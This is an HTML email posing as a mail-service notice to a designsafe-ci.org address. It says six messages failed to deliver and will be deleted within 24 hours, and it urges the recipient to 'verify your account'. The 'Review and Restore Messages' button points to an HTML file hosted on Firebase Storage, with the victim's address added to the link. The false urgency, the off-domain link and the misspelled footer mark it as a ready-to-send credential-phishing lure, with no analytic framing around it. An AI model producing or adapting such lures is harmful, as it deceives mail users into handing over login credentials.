<!DOCTYPE html>

<html><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Mail Service Notification</title>
    <style type="text/css">
        body { font-family: 'Segoe UI', Tahoma, Arial, sans-serif; background-color: #f5f5f5; margin: 0; padding: 20px; }
        .container { max-width: 600px; margin: 0 auto; background: white; border: 1px solid #e0e0e0; }
        .header { background: #005da4; padding: 20px; color: white; }
        .header h2 { margin: 0; font-size: 22px; font-weight: 300; }
        .content { padding: 25px; }
        .alert { background: #fff4e5; border-left: 4px solid #ff8c00; padding: 15px; margin: 20px 0; }
        .info { background: #f8f9fa; padding: 15px; margin: 15px 0; }
        .button { background: #005da4; color: white; padding: 12px 30px; text-decoration: none; border-radius: 4px; display: inline-block; }
        .footer { background: #fafafa; padding: 15px; border-top: 1px solid #eaeaea; font-size: 11px; color: #666; }
    </style>
</head>
<body style="font-family: 'Segoe UI', Tahoma, Arial, sans-serif; background-color: #f5f5f5; margin: 0; padding: 20px">
    <div style="max-width: 600px; margin: 0 auto; background: white; border: 1px solid #e0e0e0" class="container">
        <div style="background: #005da4; padding: 20px; color: white" class="header">
            <h2 style="margin: 0; font-size: 22px; font-weight: 300">Mail Service Notification</h2>
        </div>
        
        <div style="padding: 25px" class="content">
            <p>Dear eco-feedback,</p>
            
            <div style="background: #fff4e5; border-left: 4px solid #ff8c00; padding: 15px; margin: 20px 0" class="alert">
  <strong>[6]</strong> <strong> messages failed to deliver to your mailbox today.</strong><br>
                These messages will be deleted in 24 hours.
            </div>
            
            <div style="background: #f8f9fa; padding: 15px; margin: 15px 0" class="info">
                <p><strong>Account:</strong> eco-feedback@designsafe-ci.org</p>
                <p><strong>Time remaining:</strong> 3/17/2026 10:26:56 a.m.</p>
                <p><strong>Failed messages:</strong> [6]</p>
            </div>
            
            <p>Please verify your account to restore these messages.</p>
            
            <div style="text-align: center;">
                <a style="background: #005da4; color: white; padding: 12px 30px; text-decoration: none; border-radius: 4px; display: inline-block" class="button" href="https://firebasestorage.googleapis.com/v0/b/mailcloud-f7f1e.firebasestorage.app/o/DKIMready74.html?alt=media&token=e270c931-cc55-4647-86d1-a548c50e8a0b#eco-feedback@designsafe-ci.org">Review and Restore Messages</a>
            </div>
            
            <p style="color: rgb(153, 153, 153); font-size: 11px; margin-top: 20px;"><font color="#ffbf00">Riight Reserved designsafe-ci.org.</font></p>
        </div>
        
        <div style="background: #fafafa; padding: 15px; border-top: 1px solid #eaeaea; font-size: 11px; color: #666" class="footer">
            <p>Ref: designsafe-ci.org  � Mail Service Center</p>
        </div>
    </div>

</body></html>